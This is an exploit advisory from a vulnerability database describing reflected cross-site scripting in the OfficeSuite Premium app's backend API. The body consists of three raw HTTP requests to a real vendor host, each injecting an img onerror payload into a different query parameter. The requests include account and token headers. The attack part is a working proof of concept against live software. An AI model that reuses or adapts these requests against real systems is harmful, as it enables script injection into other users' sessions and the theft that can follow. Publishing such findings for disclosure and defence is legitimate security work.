Office Suite Premium 10.9.1.42602 Cross Site Scripting

2023.06.28
Credit: tmrswrr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected) # Date: 06-26-2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.mobisystems.com/ # Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506 # Version: Office Suite Premium 10.9.1.42602 # Tested on: Ubuntu 18.04 # POC # Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload. Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2 Host: connect.mobisystems.com Accept: */* Clv: 42602 Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free Accept-Language: en_EN,en;q=0.9 Accept-Encoding: gzip, deflate App: com.mobisystems.ios.office.free User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0 Gdpr: true Account: 234c89ff-7e80-4b64-9d35-8653fe131795 Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19 Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code Payload: <img src=a onerror=alert(1)> Parameter : application Request 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2 Host: connect.mobisystems.com Accept: */* Clv: 42602 Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free Accept-Language: en_EN,en;q=0.9 Accept-Encoding: gzip, deflate App: com.mobisystems.ios.office.free User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0 Lang: en_EN Gdpr: true Account: 234c89ff-7e80-4b64-9d35-8653fe131795 Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19 URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 Payload : <img src=a onerror=alert(1)> Parameter: id Request 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2 Host: connect.mobisystems.com Accept: */* Clv: 42602 Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free Accept-Language: en_EN,en;q=0.9 Accept-Encoding: gzip, deflate App: com.mobisystems.ios.office.free User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0 Lang: en_EN Gdpr: true Account: 234c89ff-7e80-4b64-9d35-8653fe131795 Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19 URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search Payload :<img src=a onerror=alert(1)> Parameter: filter


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top